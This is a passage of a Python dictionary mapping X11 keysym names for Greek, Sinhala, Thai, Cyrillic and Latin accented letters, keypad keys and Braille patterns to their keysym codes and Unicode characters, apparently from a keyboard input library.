'Greek_gamma': (0x07e3, u'\u03B3'),
'Greek_horizbar': (0x07af, u'\u2015'),
'Greek_iota': (0x07e9, u'\u03B9'),
'Greek_iotaaccent': (0x07b4, u'\u03AF'),
'Greek_iotaaccentdieresis': (0x07b6, u'\u0390'),
'Greek_iotadieresis': (0x07b5, u'\u03CA'),
'Greek_kappa': (0x07ea, u'\u03BA'),
'Greek_lambda': (0x07eb, u'\u03BB'),
'Greek_lamda': (0x07eb, u'\u03BB'),
'Greek_mu': (0x07ec, u'\u03BC'),
'Greek_nu': (0x07ed, u'\u03BD'),
'Greek_omega': (0x07f9, u'\u03C9'),
'Greek_omegaaccent': (0x07bb, u'\u03CE'),
'Greek_omicron': (0x07ef, u'\u03BF'),
'Greek_omicronaccent': (0x07b7, u'\u03CC'),
'Greek_phi': (0x07f6, u'\u03C6'),
'Greek_pi': (0x07f0, u'\u03C0'),
'Greek_psi': (0x07f8, u'\u03C8'),
'Greek_rho': (0x07f1, u'\u03C1'),
'Greek_sigma': (0x07f2, u'\u03C3'),
'Greek_tau': (0x07f4, u'\u03C4'),
'Greek_theta': (0x07e8, u'\u03B8'),
'Greek_upsilon': (0x07f5, u'\u03C5'),
'Greek_upsilonaccent': (0x07b8, u'\u03CD'),
'Greek_upsilonaccentdieresis': (0x07ba, u'\u03B0'),
'Greek_upsilondieresis': (0x07b9, u'\u03CB'),
'Greek_xi': (0x07ee, u'\u03BE'),
'Greek_zeta': (0x07e6, u'\u03B6'),
'H': (0x0048, u'\u0048'),
'Hcircumflex': (0x02a6, u'\u0124'),
'Hstroke': (0x02a1, u'\u0126'),
'I': (0x0049, u'\u0049'),
'Iabovedot': (0x02a9, u'\u0130'),
'Iacute': (0x00cd, u'\u00CD'),
'Ibelowdot': (0x1001eca, u'\u1ECA'),
'Ibreve': (0x100012c, u'\u012C'),
'Icircumflex': (0x00ce, u'\u00CE'),
'Idiaeresis': (0x00cf, u'\u00CF'),
'Igrave': (0x00cc, u'\u00CC'),
'Ihook': (0x1001ec8, u'\u1EC8'),
'Imacron': (0x03cf, u'\u012A'),
'Iogonek': (0x03c7, u'\u012E'),
'Itilde': (0x03a5, u'\u0128'),
'J': (0x004a, u'\u004A'),
'Jcircumflex': (0x02ac, u'\u0134'),
'K': (0x004b, u'\u004B'),
'KP_0': (0xffb0, None),
'KP_1': (0xffb1, None),
'KP_2': (0xffb2, None),
'KP_3': (0xffb3, None),
'KP_4': (0xffb4, None),
'KP_5': (0xffb5, None),
'KP_6': (0xffb6, None),
'KP_7': (0xffb7, None),
'KP_8': (0xffb8, None),
'KP_9': (0xffb9, None),
'KP_Add': (0xffab, None),
'KP_Begin': (0xff9d, None),
'KP_Decimal': (0xffae, None),
'KP_Delete': (0xff9f, None),
'KP_Divide': (0xffaf, None),
'KP_Down': (0xff99, None),
'KP_End': (0xff9c, None),
'KP_Enter': (0xff8d, None),
'KP_Equal': (0xffbd, None),
'KP_F1': (0xff91, None),
'KP_F2': (0xff92, None),
'KP_F3': (0xff93, None),
'KP_F4': (0xff94, None),
'KP_Home': (0xff95, None),
'KP_Insert': (0xff9e, None),
'KP_Left': (0xff96, None),
'KP_Multiply': (0xffaa, None),
'KP_Next': (0xff9b, None),
'KP_Page_Down': (0xff9b, None),
'KP_Page_Up': (0xff9a, None),
'KP_Prior': (0xff9a, None),
'KP_Right': (0xff98, None),
'KP_Separator': (0xffac, None),
'KP_Space': (0xff80, None),
'KP_Subtract': (0xffad, None),
'KP_Tab': (0xff89, None),
'KP_Up': (0xff97, None),
'Kcedilla': (0x03d3, u'\u0136'),
'L': (0x004c, u'\u004C'),
'Lacute': (0x01c5, u'\u0139'),
'Lbelowdot': (0x1001e36, u'\u1E36'),
'Lcaron': (0x01a5, u'\u013D'),
'Lcedilla': (0x03a6, u'\u013B'),
'LiraSign': (0x10020a4, u'\u20A4'),
'Lstroke': (0x01a3, u'\u0141'),
'M': (0x004d, u'\u004D'),
'Mabovedot': (0x1001e40, u'\u1E40'),
'Macedonia_DSE': (0x06b5, u'\u0405'),
'Macedonia_GJE': (0x06b2, u'\u0403'),
'Macedonia_KJE': (0x06bc, u'\u040C'),
'Macedonia_dse': (0x06a5, u'\u0455'),
'Macedonia_gje': (0x06a2, u'\u0453'),
'Macedonia_kje': (0x06ac, u'\u045C'),
'MillSign': (0x10020a5, u'\u20A5'),
'N': (0x004e, u'\u004E'),
'Nacute': (0x01d1, u'\u0143'),
'NairaSign': (0x10020a6, u'\u20A6'),
'Ncaron': (0x01d2, u'\u0147'),
'Ncedilla': (0x03d1, u'\u0145'),
'NewSheqelSign': (0x10020aa, u'\u20AA'),
'Ntilde': (0x00d1, u'\u00D1'),
'O': (0x004f, u'\u004F'),
'OE': (0x13bc, u'\u0152'),
'Oacute': (0x00d3, u'\u00D3'),
'Obarred': (0x100019f, u'\u019F'),
'Obelowdot': (0x1001ecc, u'\u1ECC'),
'Ocaron': (0x10001d1, u'\u01D2'),
'Ocircumflex': (0x00d4, u'\u00D4'),
'Ocircumflexacute': (0x1001ed0, u'\u1ED0'),
'Ocircumflexbelowdot': (0x1001ed8, u'\u1ED8'),
'Ocircumflexgrave': (0x1001ed2, u'\u1ED2'),
'Ocircumflexhook': (0x1001ed4, u'\u1ED4'),
'Ocircumflextilde': (0x1001ed6, u'\u1ED6'),
'Odiaeresis': (0x00d6, u'\u00D6'),
'Odoubleacute': (0x01d5, u'\u0150'),
'Ograve': (0x00d2, u'\u00D2'),
'Ohook': (0x1001ece, u'\u1ECE'),
'Ohorn': (0x10001a0, u'\u01A0'),
'Ohornacute': (0x1001eda, u'\u1EDA'),
'Ohornbelowdot': (0x1001ee2, u'\u1EE2'),
'Ohorngrave': (0x1001edc, u'\u1EDC'),
'Ohornhook': (0x1001ede, u'\u1EDE'),
'Ohorntilde': (0x1001ee0, u'\u1EE0'),
'Omacron': (0x03d2, u'\u014C'),
'Ooblique': (0x00d8, u'\u00D8'),
'Oslash': (0x00d8, u'\u00D8'),
'Otilde': (0x00d5, u'\u00D5'),
'P': (0x0050, u'\u0050'),
'Pabovedot': (0x1001e56, u'\u1E56'),
'PesetaSign': (0x10020a7, u'\u20A7'),
'Q': (0x0051, u'\u0051'),
'R': (0x0052, u'\u0052'),
'Racute': (0x01c0, u'\u0154'),
'Rcaron': (0x01d8, u'\u0158'),
'Rcedilla': (0x03a3, u'\u0156'),
'RupeeSign': (0x10020a8, u'\u20A8'),
'S': (0x0053, u'\u0053'),
'SCHWA': (0x100018f, u'\u018F'),
'Sabovedot': (0x1001e60, u'\u1E60'),
'Sacute': (0x01a6, u'\u015A'),
'Scaron': (0x01a9, u'\u0160'),
'Scedilla': (0x01aa, u'\u015E'),
'Scircumflex': (0x02de, u'\u015C'),
'Serbian_DJE': (0x06b1, u'\u0402'),
'Serbian_TSHE': (0x06bb, u'\u040B'),
'Serbian_dje': (0x06a1, u'\u0452'),
'Serbian_tshe': (0x06ab, u'\u045B'),
'Sinh_a': (0x1000d85, u'\u0D85'),
'Sinh_aa': (0x1000d86, u'\u0D86'),
'Sinh_aa2': (0x1000dcf, u'\u0DCF'),
'Sinh_ae': (0x1000d87, u'\u0D87'),
'Sinh_ae2': (0x1000dd0, u'\u0DD0'),
'Sinh_aee': (0x1000d88, u'\u0D88'),
'Sinh_aee2': (0x1000dd1, u'\u0DD1'),
'Sinh_ai': (0x1000d93, u'\u0D93'),
'Sinh_ai2': (0x1000ddb, u'\u0DDB'),
'Sinh_al': (0x1000dca, u'\u0DCA'),
'Sinh_au': (0x1000d96, u'\u0D96'),
'Sinh_au2': (0x1000dde, u'\u0DDE'),
'Sinh_ba': (0x1000db6, u'\u0DB6'),
'Sinh_bha': (0x1000db7, u'\u0DB7'),
'Sinh_ca': (0x1000da0, u'\u0DA0'),
'Sinh_cha': (0x1000da1, u'\u0DA1'),
'Sinh_dda': (0x1000da9, u'\u0DA9'),
'Sinh_ddha': (0x1000daa, u'\u0DAA'),
'Sinh_dha': (0x1000daf, u'\u0DAF'),
'Sinh_dhha': (0x1000db0, u'\u0DB0'),
'Sinh_e': (0x1000d91, u'\u0D91'),
'Sinh_e2': (0x1000dd9, u'\u0DD9'),
'Sinh_ee': (0x1000d92, u'\u0D92'),
'Sinh_ee2': (0x1000dda, u'\u0DDA'),
'Sinh_fa': (0x1000dc6, u'\u0DC6'),
'Sinh_ga': (0x1000d9c, u'\u0D9C'),
'Sinh_gha': (0x1000d9d, u'\u0D9D'),
'Sinh_h2': (0x1000d83, u'\u0D83'),
'Sinh_ha': (0x1000dc4, u'\u0DC4'),
'Sinh_i': (0x1000d89, u'\u0D89'),
'Sinh_i2': (0x1000dd2, u'\u0DD2'),
'Sinh_ii': (0x1000d8a, u'\u0D8A'),
'Sinh_ii2': (0x1000dd3, u'\u0DD3'),
'Sinh_ja': (0x1000da2, u'\u0DA2'),
'Sinh_jha': (0x1000da3, u'\u0DA3'),
'Sinh_jnya': (0x1000da5, u'\u0DA5'),
'Sinh_ka': (0x1000d9a, u'\u0D9A'),
'Sinh_kha': (0x1000d9b, u'\u0D9B'),
'Sinh_kunddaliya': (0x1000df4, u'\u0DF4'),
'Sinh_la': (0x1000dbd, u'\u0DBD'),
'Sinh_lla': (0x1000dc5, u'\u0DC5'),
'Sinh_lu': (0x1000d8f, u'\u0D8F'),
'Sinh_lu2': (0x1000ddf, u'\u0DDF'),
'Sinh_luu': (0x1000d90, u'\u0D90'),
'Sinh_luu2': (0x1000df3, u'\u0DF3'),
'Sinh_ma': (0x1000db8, u'\u0DB8'),
'Sinh_mba': (0x1000db9, u'\u0DB9'),
'Sinh_na': (0x1000db1, u'\u0DB1'),
'Sinh_ndda': (0x1000dac, u'\u0DAC'),
'Sinh_ndha': (0x1000db3, u'\u0DB3'),
'Sinh_ng': (0x1000d82, u'\u0D82'),
'Sinh_ng2': (0x1000d9e, u'\u0D9E'),
'Sinh_nga': (0x1000d9f, u'\u0D9F'),
'Sinh_nja': (0x1000da6, u'\u0DA6'),
'Sinh_nna': (0x1000dab, u'\u0DAB'),
'Sinh_nya': (0x1000da4, u'\u0DA4'),
'Sinh_o': (0x1000d94, u'\u0D94'),
'Sinh_o2': (0x1000ddc, u'\u0DDC'),
'Sinh_oo': (0x1000d95, u'\u0D95'),
'Sinh_oo2': (0x1000ddd, u'\u0DDD'),
'Sinh_pa': (0x1000db4, u'\u0DB4'),
'Sinh_pha': (0x1000db5, u'\u0DB5'),
'Sinh_ra': (0x1000dbb, u'\u0DBB'),
'Sinh_ri': (0x1000d8d, u'\u0D8D'),
'Sinh_rii': (0x1000d8e, u'\u0D8E'),
'Sinh_ru2': (0x1000dd8, u'\u0DD8'),
'Sinh_ruu2': (0x1000df2, u'\u0DF2'),
'Sinh_sa': (0x1000dc3, u'\u0DC3'),
'Sinh_sha': (0x1000dc1, u'\u0DC1'),
'Sinh_ssha': (0x1000dc2, u'\u0DC2'),
'Sinh_tha': (0x1000dad, u'\u0DAD'),
'Sinh_thha': (0x1000dae, u'\u0DAE'),
'Sinh_tta': (0x1000da7, u'\u0DA7'),
'Sinh_ttha': (0x1000da8, u'\u0DA8'),
'Sinh_u': (0x1000d8b, u'\u0D8B'),
'Sinh_u2': (0x1000dd4, u'\u0DD4'),
'Sinh_uu': (0x1000d8c, u'\u0D8C'),
'Sinh_uu2': (0x1000dd6, u'\u0DD6'),
'Sinh_va': (0x1000dc0, u'\u0DC0'),
'Sinh_ya': (0x1000dba, u'\u0DBA'),
'T': (0x0054, u'\u0054'),
'THORN': (0x00de, u'\u00DE'),
'Tabovedot': (0x1001e6a, u'\u1E6A'),
'Tcaron': (0x01ab, u'\u0164'),
'Tcedilla': (0x01de, u'\u0162'),
'Thai_baht': (0x0ddf, u'\u0E3F'),
'Thai_bobaimai': (0x0dba, u'\u0E1A'),
'Thai_chochan': (0x0da8, u'\u0E08'),
'Thai_chochang': (0x0daa, u'\u0E0A'),
'Thai_choching': (0x0da9, u'\u0E09'),
'Thai_chochoe': (0x0dac, u'\u0E0C'),
'Thai_dochada': (0x0dae, u'\u0E0E'),
'Thai_dodek': (0x0db4, u'\u0E14'),
'Thai_fofa': (0x0dbd, u'\u0E1D'),
'Thai_fofan': (0x0dbf, u'\u0E1F'),
'Thai_hohip': (0x0dcb, u'\u0E2B'),
'Thai_honokhuk': (0x0dce, u'\u0E2E'),
'Thai_khokhai': (0x0da2, u'\u0E02'),
'Thai_khokhon': (0x0da5, u'\u0E05'),
'Thai_khokhuat': (0x0da3, u'\u0E03'),
'Thai_khokhwai': (0x0da4, u'\u0E04'),
'Thai_khorakhang': (0x0da6, u'\u0E06'),
'Thai_kokai': (0x0da1, u'\u0E01'),
'Thai_lakkhangyao': (0x0de5, u'\u0E45'),
'Thai_lekchet': (0x0df7, u'\u0E57'),
'Thai_lekha': (0x0df5, u'\u0E55'),
'Thai_lekhok': (0x0df6, u'\u0E56'),
'Thai_lekkao': (0x0df9, u'\u0E59'),
'Thai_leknung': (0x0df1, u'\u0E51'),
'Thai_lekpaet': (0x0df8, u'\u0E58'),
'Thai_leksam': (0x0df3, u'\u0E53'),
'Thai_leksi': (0x0df4, u'\u0E54'),
'Thai_leksong': (0x0df2, u'\u0E52'),
'Thai_leksun': (0x0df0, u'\u0E50'),
'Thai_lochula': (0x0dcc, u'\u0E2C'),
'Thai_loling': (0x0dc5, u'\u0E25'),
'Thai_lu': (0x0dc6, u'\u0E26'),
'Thai_maichattawa': (0x0deb, u'\u0E4B'),
'Thai_maiek': (0x0de8, u'\u0E48'),
'Thai_maihanakat': (0x0dd1, u'\u0E31'),
'Thai_maitaikhu': (0x0de7, u'\u0E47'),
'Thai_maitho': (0x0de9, u'\u0E49'),
'Thai_maitri': (0x0dea, u'\u0E4A'),
'Thai_maiyamok': (0x0de6, u'\u0E46'),
'Thai_moma': (0x0dc1, u'\u0E21'),
'Thai_ngongu': (0x0da7, u'\u0E07'),
'Thai_nikhahit': (0x0ded, u'\u0E4D'),
'Thai_nonen': (0x0db3, u'\u0E13'),
'Thai_nonu': (0x0db9, u'\u0E19'),
'Thai_oang': (0x0dcd, u'\u0E2D'),
'Thai_paiyannoi': (0x0dcf, u'\u0E2F'),
'Thai_phinthu': (0x0dda, u'\u0E3A'),
'Thai_phophan': (0x0dbe, u'\u0E1E'),
'Thai_phophung': (0x0dbc, u'\u0E1C'),
'Thai_phosamphao': (0x0dc0, u'\u0E20'),
'Thai_popla': (0x0dbb, u'\u0E1B'),
'Thai_rorua': (0x0dc3, u'\u0E23'),
'Thai_ru': (0x0dc4, u'\u0E24'),
'Thai_saraa': (0x0dd0, u'\u0E30'),
'Thai_saraaa': (0x0dd2, u'\u0E32'),
'Thai_saraae': (0x0de1, u'\u0E41'),
'Thai_saraaimaimalai': (0x0de4, u'\u0E44'),
'Thai_saraaimaimuan': (0x0de3, u'\u0E43'),
'Thai_saraam': (0x0dd3, u'\u0E33'),
'Thai_sarae': (0x0de0, u'\u0E40'),
'Thai_sarai': (0x0dd4, u'\u0E34'),
'Thai_saraii': (0x0dd5, u'\u0E35'),
'Thai_sarao': (0x0de2, u'\u0E42'),
'Thai_sarau': (0x0dd8, u'\u0E38'),
'Thai_saraue': (0x0dd6, u'\u0E36'),
'Thai_sarauee': (0x0dd7, u'\u0E37'),
'Thai_sarauu': (0x0dd9, u'\u0E39'),
'Thai_sorusi': (0x0dc9, u'\u0E29'),
'Thai_sosala': (0x0dc8, u'\u0E28'),
'Thai_soso': (0x0dab, u'\u0E0B'),
'Thai_sosua': (0x0dca, u'\u0E2A'),
'Thai_thanthakhat': (0x0dec, u'\u0E4C'),
'Thai_thonangmontho': (0x0db1, u'\u0E11'),
'Thai_thophuthao': (0x0db2, u'\u0E12'),
'Thai_thothahan': (0x0db7, u'\u0E17'),
'Thai_thothan': (0x0db0, u'\u0E10'),
'Thai_thothong': (0x0db8, u'\u0E18'),
'Thai_thothung': (0x0db6, u'\u0E16'),
'Thai_topatak': (0x0daf, u'\u0E0F'),
'Thai_totao': (0x0db5, u'\u0E15'),
'Thai_wowaen': (0x0dc7, u'\u0E27'),
'Thai_yoyak': (0x0dc2, u'\u0E22'),
'Thai_yoying': (0x0dad, u'\u0E0D'),
'Tslash': (0x03ac, u'\u0166'),
'U': (0x0055, u'\u0055'),
'Uacute': (0x00da, u'\u00DA'),
'Ubelowdot': (0x1001ee4, u'\u1EE4'),
'Ubreve': (0x02dd, u'\u016C'),
'Ucircumflex': (0x00db, u'\u00DB'),
'Udiaeresis': (0x00dc, u'\u00DC'),
'Udoubleacute': (0x01db, u'\u0170'),
'Ugrave': (0x00d9, u'\u00D9'),
'Uhook': (0x1001ee6, u'\u1EE6'),
'Uhorn': (0x10001af, u'\u01AF'),
'Uhornacute': (0x1001ee8, u'\u1EE8'),
'Uhornbelowdot': (0x1001ef0, u'\u1EF0'),
'Uhorngrave': (0x1001eea, u'\u1EEA'),
'Uhornhook': (0x1001eec, u'\u1EEC'),
'Uhorntilde': (0x1001eee, u'\u1EEE'),
'Ukrainian_GHE_WITH_UPTURN': (0x06bd, u'\u0490'),
'Ukrainian_I': (0x06b6, u'\u0406'),
'Ukrainian_IE': (0x06b4, u'\u0404'),
'Ukrainian_YI': (0x06b7, u'\u0407'),
'Ukrainian_ghe_with_upturn': (0x06ad, u'\u0491'),
'Ukrainian_i': (0x06a6, u'\u0456'),
'Ukrainian_ie': (0x06a4, u'\u0454'),
'Ukrainian_yi': (0x06a7, u'\u0457'),
'Umacron': (0x03de, u'\u016A'),
'Uogonek': (0x03d9, u'\u0172'),
'Uring': (0x01d9, u'\u016E'),
'Utilde': (0x03dd, u'\u0168'),
'V': (0x0056, u'\u0056'),
'W': (0x0057, u'\u0057'),
'Wacute': (0x1001e82, u'\u1E82'),
'Wcircumflex': (0x1000174, u'\u0174'),
'Wdiaeresis': (0x1001e84, u'\u1E84'),
'Wgrave': (0x1001e80, u'\u1E80'),
'WonSign': (0x10020a9, u'\u20A9'),
'X': (0x0058, u'\u0058'),
'Xabovedot': (0x1001e8a, u'\u1E8A'),
'Y': (0x0059, u'\u0059'),
'Yacute': (0x00dd, u'\u00DD'),
'Ybelowdot': (0x1001ef4, u'\u1EF4'),
'Ycircumflex': (0x1000176, u'\u0176'),
'Ydiaeresis': (0x13be, u'\u0178'),
'Ygrave': (0x1001ef2, u'\u1EF2'),
'Yhook': (0x1001ef6, u'\u1EF6'),
'Ytilde': (0x1001ef8, u'\u1EF8'),
'Z': (0x005a, u'\u005A'),
'Zabovedot': (0x01af, u'\u017B'),
'Zacute': (0x01ac, u'\u0179'),
'Zcaron': (0x01ae, u'\u017D'),
'Zstroke': (0x10001b5, u'\u01B5'),
'a': (0x0061, u'\u0061'),
'aacute': (0x00e1, u'\u00E1'),
'abelowdot': (0x1001ea1, u'\u1EA1'),
'abovedot': (0x01ff, u'\u02D9'),
'abreve': (0x01e3, u'\u0103'),
'abreveacute': (0x1001eaf, u'\u1EAF'),
'abrevebelowdot': (0x1001eb7, u'\u1EB7'),
'abrevegrave': (0x1001eb1, u'\u1EB1'),
'abrevehook': (0x1001eb3, u'\u1EB3'),
'abrevetilde': (0x1001eb5, u'\u1EB5'),
'acircumflex': (0x00e2, u'\u00E2'),
'acircumflexacute': (0x1001ea5, u'\u1EA5'),
'acircumflexbelowdot': (0x1001ead, u'\u1EAD'),
'acircumflexgrave': (0x1001ea7, u'\u1EA7'),
'acircumflexhook': (0x1001ea9, u'\u1EA9'),
'acircumflextilde': (0x1001eab, u'\u1EAB'),
'acute': (0x00b4, u'\u00B4'),
'adiaeresis': (0x00e4, u'\u00E4'),
'ae': (0x00e6, u'\u00E6'),
'agrave': (0x00e0, u'\u00E0'),
'ahook': (0x1001ea3, u'\u1EA3'),
'amacron': (0x03e0, u'\u0101'),
'ampersand': (0x0026, u'\u0026'),
'aogonek': (0x01b1, u'\u0105'),
'apostrophe': (0x0027, u'\u0027'),
'approxeq': (0x1002248, u'\u2245'),
'approximate': (0x08c8, u'\u223C'),
'aring': (0x00e5, u'\u00E5'),
'asciicircum': (0x005e, u'\u005E'),
'asciitilde': (0x007e, u'\u007E'),
'asterisk': (0x002a, u'\u002A'),
'at': (0x0040, u'\u0040'),
'atilde': (0x00e3, u'\u00E3'),
'b': (0x0062, u'\u0062'),
'babovedot': (0x1001e03, u'\u1E03'),
'backslash': (0x005c, u'\u005C'),
'ballotcross': (0x0af4, u'\u2717'),
'bar': (0x007c, u'\u007C'),
'because': (0x1002235, u'\u2235'),
'botintegral': (0x08a5, u'\u2321'),
'botleftparens': (0x08ac, u'\u239D'),
'botleftsqbracket': (0x08a8, u'\u23A3'),
'botrightparens': (0x08ae, u'\u23A0'),
'botrightsqbracket': (0x08aa, u'\u23A6'),
'bott': (0x09f6, u'\u2534'),
'braceleft': (0x007b, u'\u007B'),
'braceright': (0x007d, u'\u007D'),
'bracketleft': (0x005b, u'\u005B'),
'bracketright': (0x005d, u'\u005D'),
'braille_blank': (0x1002800, u'\u2800'),
'braille_dots_1': (0x1002801, u'\u2801'),
'braille_dots_12': (0x1002803, u'\u2803'),
'braille_dots_123': (0x1002807, u'\u2807'),
'braille_dots_1234': (0x100280f, u'\u280f'),
'braille_dots_12345': (0x100281f, u'\u281f'),
'braille_dots_123456': (0x100283f, u'\u283f'),
'braille_dots_1234567': (0x100287f, u'\u287f'),
'braille_dots_12345678': (0x10028ff, u'\u28ff'),
'braille_dots_1234568': (0x10028bf, u'\u28bf'),
'braille_dots_123457': (0x100285f, u'\u285f'),
'braille_dots_1234578': (0x10028df, u'\u28df'),
'braille_dots_123458': (0x100289f, u'\u289f'),
'braille_dots_12346': (0x100282f, u'\u282f'),
'braille_dots_123467': (0x100286f, u'\u286f'),
'braille_dots_1234678': (0x10028ef, u'\u28ef'),
'braille_dots_123468': (0x10028af, u'\u28af'),
'braille_dots_12347': (0x100284f, u'\u284f'),
'braille_dots_123478': (0x10028cf, u'\u28cf'),
'braille_dots_12348': (0x100288f, u'\u288f'),
'braille_dots_1235': (0x1002817, u'\u2817'),
'braille_dots_12356': (0x1002837, u'\u2837'),
'braille_dots_123567': (0x1002877, u'\u2877'),
'braille_dots_1235678': (0x10028f7, u'\u28f7'),
'braille_dots_123568': (0x10028b7, u'\u28b7'),
'braille_dots_12357': (0x1002857, u'\u2857'),
'braille_dots_123578': (0x10028d7, u'\u28d7'),
'braille_dots_12358': (0x1002897, u'\u2897'),
'braille_dots_1236': (0x1002827, u'\u2827'),
'braille_dots_12367': (0x1002867, u'\u2867'),
'braille_dots_123678': (0x10028e7, u'\u28e7'),
'braille_dots_12368': (0x10028a7, u'\u28a7'),
'braille_dots_1237': (0x1002847, u'\u2847'),
'braille_dots_12378': (0x10028c7, u'\u28c7'),
'braille_dots_1238': (0x1002887, u'\u2887'),
'braille_dots_124': (0x100280b, u'\u280b'),
'braille_dots_1245': (0x100281b, u'\u281b'),
'braille_dots_12456': (0x100283b, u'\u283b'),
'braille_dots_124567': (0x100287b, u'\u287b'),
'braille_dots_1245678': (0x10028fb, u'\u28fb'),
'braille_dots_124568': (0x10028bb, u'\u28bb'),
'braille_dots_12457': (0x100285b, u'\u285b'),
'braille_dots_124578': (0x10028db, u'\u28db'),
'braille_dots_12458': (0x100289b, u'\u289b'),
'braille_dots_1246': (0x100282b, u'\u282b'),
'braille_dots_12467': (0x100286b, u'\u286b'),
'braille_dots_124678': (0x10028eb, u'\u28eb'),
'braille_dots_12468': (0x10028ab, u'\u28ab'),
'braille_dots_1247': (0x100284b, u'\u284b'),
'braille_dots_12478': (0x10028cb, u'\u28cb'),
'braille_dots_1248': (0x100288b, u'\u288b'),
'braille_dots_125': (0x1002813, u'\u2813'),
'braille_dots_1256': (0x1002833, u'\u2833'),
'braille_dots_12567': (0x1002873, u'\u2873'),
'braille_dots_125678': (0x10028f3, u'\u28f3'),
'braille_dots_12568': (0x10028b3, u'\u28b3'),
'braille_dots_1257': (0x1002853, u'\u2853'),
'braille_dots_12578': (0x10028d3, u'\u28d3'),
'braille_dots_1258': (0x1002893, u'\u2893'),
'braille_dots_126': (0x1002823, u'\u2823'),
'braille_dots_1267': (0x1002863, u'\u2863'),
'braille_dots_12678': (0x10028e3, u'\u28e3'),
'braille_dots_1268': (0x10028a3, u'\u28a3'),
'braille_dots_127': (0x1002843, u'\u2843'),
'braille_dots_1278': (0x10028c3, u'\u28c3'),
'braille_dots_128': (0x1002883, u'\u2883'),
'braille_dots_13': (0x1002805, u'\u2805'),
'braille_dots_134': (0x100280d, u'\u280d'),
'braille_dots_1345': (0x100281d, u'\u281d'),
'braille_dots_13456': (0x100283d, u'\u283d'),
'braille_dots_134567': (0x100287d, u'\u287d'),
'braille_dots_1345678': (0x10028fd, u'\u28fd'),
'braille_dots_134568': (0x10028bd, u'\u28bd'),
'braille_dots_13457': (0x100285d, u'\u285d'),
'braille_dots_134578': (0x10028dd, u'\u28dd'),
'braille_dots_13458': (0x100289d, u'\u289d'),
'braille_dots_1346': (0x100282d, u'\u282d'),
'braille_dots_13467': (0x100286d, u'\u286d'),
'braille_dots_134678': (0x10028ed, u'\u28ed'),
'braille_dots_13468': (0x10028ad, u'\u28ad'),
'braille_dots_1347': (0x100284d, u'\u284d'),
'braille_dots_13478': (0x10028cd, u'\u28cd'),
'braille_dots_1348': (0x100288d, u'\u288d'),
'braille_dots_135': (0x1002815, u'\u2815'),
'braille_dots_1356': (0x1002835, u'\u2835'),
'braille_dots_13567': (0x1002875, u'\u2875'),
'braille_dots_135678': (0x10028f5, u'\u28f5'),
'braille_dots_13568': (0x10028b5, u'\u28b5'),
'braille_dots_1357': (0x1002855, u'\u2855'),
'braille_dots_13578': (0x10028d5, u'\u28d5'),
'braille_dots_1358': (0x1002895, u'\u2895'),
'braille_dots_136': (0x1002825, u'\u2825'),
'braille_dots_1367': (0x1002865, u'\u2865'),
'braille_dots_13678': (0x10028e5, u'\u28e5'),
'braille_dots_1368': (0x10028a5, u'\u28a5'),
'braille_dots_137': (0x1002845, u'\u2845'),
'braille_dots_1378': (0x10028c5, u'\u28c5'),
'braille_dots_138': (0x1002885, u'\u2885'),
'braille_dots_14': (0x1002809, u'\u2809'),
'braille_dots_145': (0x1002819, u'\u2819'),
'braille_dots_1456': (0x1002839, u'\u2839'),
'braille_dots_14567': (0x1002879, u'\u2879'),
'braille_dots_145678': (0x10028f9, u'\u28f9'),
'braille_dots_14568': (0x10028b9, u'\u28b9'),
'braille_dots_1457': (0x1002859, u'\u2859'),
'braille_dots_14578': (0x10028d9, u'\u28d9'),
'braille_dots_1458': (0x1002899, u'\u2899'),
'braille_dots_146': (0x1002829, u'\u2829'),
'braille_dots_1467': (0x1002869, u'\u2869'),
'braille_dots_14678': (0x10028e9, u'\u28e9'),
'braille_dots_1468': (0x10028a9, u'\u28a9'),
'braille_dots_147': (0x1002849, u'\u2849'),
'braille_dots_1478': (0x10028c9, u'\u28c9'),
'braille_dots_148': (0x1002889, u'\u2889'),
'braille_dots_15': (0x1002811, u'\u2811'),
'braille_dots_156': (0x1002831, u'\u2831'),
'braille_dots_1567': (0x1002871, u'\u2871'),
'braille_dots_15678': (0x10028f1, u'\u28f1'),
'braille_dots_1568': (0x10028b1, u'\u28b1'),
'braille_dots_157': (0x1002851, u'\u2851'),
'braille_dots_1578': (0x10028d1, u'\u28d1'),
'braille_dots_158': (0x1002891, u'\u2891'),
'braille_dots_16': (0x1002821, u'\u2821'),
'braille_dots_167': (0x1002861, u'\u2861'),
'braille_dots_1678': (0x10028e1, u'\u28e1'),
'braille_dots_168': (0x10028a1, u'\u28a1'),
'braille_dots_17': (0x1002841, u'\u2841'),
'braille_dots_178': (0x10028c1, u'\u28c1'),
'braille_dots_18': (0x1002881, u'\u2881'),
'braille_dots_2': (0x1002802, u'\u2802'),
'braille_dots_23': (0x1002806, u'\u2806'),
'braille_dots_234': (0x100280e, u'\u280e'),
'braille_dots_2345': (0x100281e, u'\u281e'),
'braille_dots_23456': (0x100283e, u'\u283e'),
'braille_dots_234567': (0x100287e, u'\u287e'),
'braille_dots_2345678': (0x10028fe, u'\u28fe'),
'braille_dots_234568': (0x10028be, u'\u28be'),
'braille_dots_23457': (0x100285e, u'\u285e'),
'braille_dots_234578': (0x10028de, u'\u28de'),
'braille_dots_23458': (0x100289e, u'\u289e'),
'braille_dots_2346': (0x100282e, u'\u282e'),
'braille_dots_23467': (0x100286e, u'\u286e'),
'braille_dots_234678': (0x10028ee, u'\u28ee'),
'braille_dots_23468': (0x10028ae, u'\u28ae'),
'braille_dots_2347': (0x100284e, u'\u284e'),
'braille_dots_23478': (0x10028ce, u'\u28ce'),
'braille_dots_2348': (0x100288e, u'\u288e'),
'braille_dots_235': (0x1002816, u'\u2816'),
'braille_dots_2356': (0x1002836, u'\u2836'),
'braille_dots_23567': (0x1002876, u'\u2876'),
'braille_dots_235678': (0x10028f6, u'\u28f6'),
'braille_dots_23568': (0x10028b6, u'\u28b6'),
'braille_dots_2357': (0x1002856, u'\u2856'),
'braille_dots_23578': (0x10028d6, u'\u28d6'),
'braille_dots_2358': (0x1002896, u'\u2896'),
'braille_dots_236': (0x1002826, u'\u2826'),
'braille_dots_2367': (0x1002866, u'\u2866'),
'braille_dots_23678': (0x10028e6, u'\u28e6'),
'braille_dots_2368': (0x10028a6, u'\u28a6'),
'braille_dots_237': (0x1002846, u'\u2846'),
'braille_dots_2378': (0x10028c6, u'\u28c6'),
'braille_dots_238': (0x1002886, u'\u2886'),
'braille_dots_24': (0x100280a, u'\u280a'),
'braille_dots_245': (0x100281a, u'\u281a'),
'braille_dots_2456': (0x100283a, u'\u283a'),
'braille_dots_24567': (0x100287a, u'\u287a'),
'braille_dots_245678': (0x10028fa, u'\u28fa'),
'braille_dots_24568': (0x10028ba, u'\u28ba'),
